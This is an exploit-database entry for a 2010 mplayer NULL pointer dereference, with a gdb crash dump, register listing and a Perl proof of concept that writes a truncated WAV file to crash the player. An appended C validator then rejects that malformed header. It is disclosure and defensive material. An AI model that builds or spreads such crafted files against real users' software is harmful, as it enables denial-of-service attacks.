0day.today - Biggest Exploit Database in the World.
mplayer <= 4.4.1 NULL pointer dereference exploit poc
=====================================================
mplayer <= 4.4.1 NULL pointer dereference exploit poc
=====================================================

# Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day
# Date: 17/03/2010
# Author: Pietro Oliva
# Software Link:
# Version: <= 4.4.1
# Tested on: ubuntu 9.10 but should work in windows too
# CVE :

#Program received signal SIGSEGV, Segmentation fault.
#0x081176d8 in af_calc_filter_multiplier ()
#(gdb) disas af_calc_filter_multiplier
#Dump of assembler code for function af_calc_filter_multiplier:
#0x081176d0 <af_calc_filter_multiplier+0>:  push %ebp
#0x081176d1 <af_calc_filter_multiplier+1>:  mov %esp,%ebp
#0x081176d3 <af_calc_filter_multiplier+3>:  fld1
#0x081176d5 <af_calc_filter_multiplier+5>:  mov 0x8(%ebp),%eax
#0x081176d8 <af_calc_filter_multiplier+8>:  mov (%eax),%eax   ==> mplayer tries to dereference eax, which is a NULL pointer!!!
#0x081176da <af_calc_filter_multiplier+10>: lea 0x0(%esi),%esi
#0x081176e0 <af_calc_filter_multiplier+16>: fmull 0x28(%eax)
#0x081176e3 <af_calc_filter_multiplier+19>: mov 0x18(%eax),%eax
#0x081176e6 <af_calc_filter_multiplier+22>: test %eax,%eax
#0x081176e8 <af_calc_filter_multiplier+24>: jne 0x81176e0 <af_calc_filter_multiplier+16>
#0x081176ea <af_calc_filter_multiplier+26>: pop %ebp
#0x081176eb <af_calc_filter_multiplier+27>: ret
#End of assembler dump.

# REGISTERS:
#eax    0x0         0            ==========> NULL
#ecx    0xfa157a57  -99255721
#edx    0x1fe0      8160
#ebx    0x8509a08   139500040
#esp    0xbfffe2e8  0xbfffe2e8
#ebp    0xbfffe2e8  0xbfffe2e8
#esi    0x7b84000   129515520
#edi    0xf8000     1015808
#eip    0x81176d8   0x81176d8 <af_calc_filter_multiplier+8>
#eflags 0x10216     [ PF AF IF RF ]
#cs     0x73        115
#ss     0x7b        123
#ds     0x7b        123
#es     0x7b        123
#fs     0x0         0
#gs     0x33        51

#!/usr/bin/perl
print "[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\n";
print "[+] pietroliva[at]gmail[dot]com http://olivapietro.altervista.org\n";
print "[+] creating crafted file mplayer.wav\n";
$buffer="\x52\x49\x46\x46\x1f\x04\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20\x10\x00\x00\x00\x01\x00\x1f";
open(file,"> mplayer.wav");
print(file $buffer);
print "[+] done!\n";

# 0day.today [2024-11-15] #
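
The file written above declares a 16-byte "fmt " chunk but ends 3 bytes into it. The following is an added example, not part of the original advisory or of mplayer's code: a pre-parse check a media pipeline can run so that a truncated or zeroed "fmt " chunk is rejected before any audio filter chain is built from it. The function, enum and array names are this example's own, and good_wav is a constructed comparison header.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum wav_check { WAV_OK, WAV_NOT_RIFF_WAVE, WAV_NO_FMT, WAV_FMT_TRUNCATED,
                 WAV_FMT_TOO_SMALL, WAV_BAD_PARAMS };

/* The 23 bytes written by the PoC on this page. */
static const uint8_t poc_wav[] = {
    'R','I','F','F', 0x1f,0x04,0,0, 'W','A','V','E',
    'f','m','t',' ', 0x10,0,0,0, 0x01,0x00,0x1f };
/* Constructed for comparison: mono, 8000 Hz, 16-bit PCM, empty data chunk. */
static const uint8_t good_wav[] = {
    'R','I','F','F', 36,0,0,0, 'W','A','V','E', 'f','m','t',' ', 16,0,0,0,
    1,0, 1,0, 0x40,0x1f,0,0, 0x80,0x3e,0,0, 2,0, 16,0, 'd','a','t','a', 0,0,0,0 };

static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }

/* Validate "fmt " against the bytes actually present, not the declared sizes. */
enum wav_check wav_check_fmt(const uint8_t *buf, size_t len) {
    if (len < 12 || memcmp(buf, "RIFF", 4) || memcmp(buf + 8, "WAVE", 4))
        return WAV_NOT_RIFF_WAVE;
    size_t off = 12;
    while (len - off >= 8) {
        uint32_t size = le32(buf + off + 4);
        const uint8_t *body = buf + off + 8;
        size_t avail = len - off - 8;
        if (memcmp(buf + off, "fmt ", 4) == 0) {
            if (size < 16) return WAV_FMT_TOO_SMALL;
            if (avail < size) return WAV_FMT_TRUNCATED;
            /* channels, sample rate, block align, bits per sample */
            if (!le16(body + 2) || !le32(body + 4) || !le16(body + 12) || !le16(body + 14))
                return WAV_BAD_PARAMS;
            return WAV_OK;
        }
        if (size > avail) return WAV_NO_FMT;   /* chunk runs past end of file */
        off += 8 + size;
        if ((size & 1) && off < len) off++;    /* bodies are padded to even length */
    }
    return WAV_NO_FMT;
}

int main(void) {
    printf("poc=%d good=%d\n", wav_check_fmt(poc_wav, sizeof poc_wav),
           wav_check_fmt(good_wav, sizeof good_wav));
    return 0;
}
```

A check like this only filters malformed input; the crash site shown in the disassembly still needs its own NULL check on the pointer it receives.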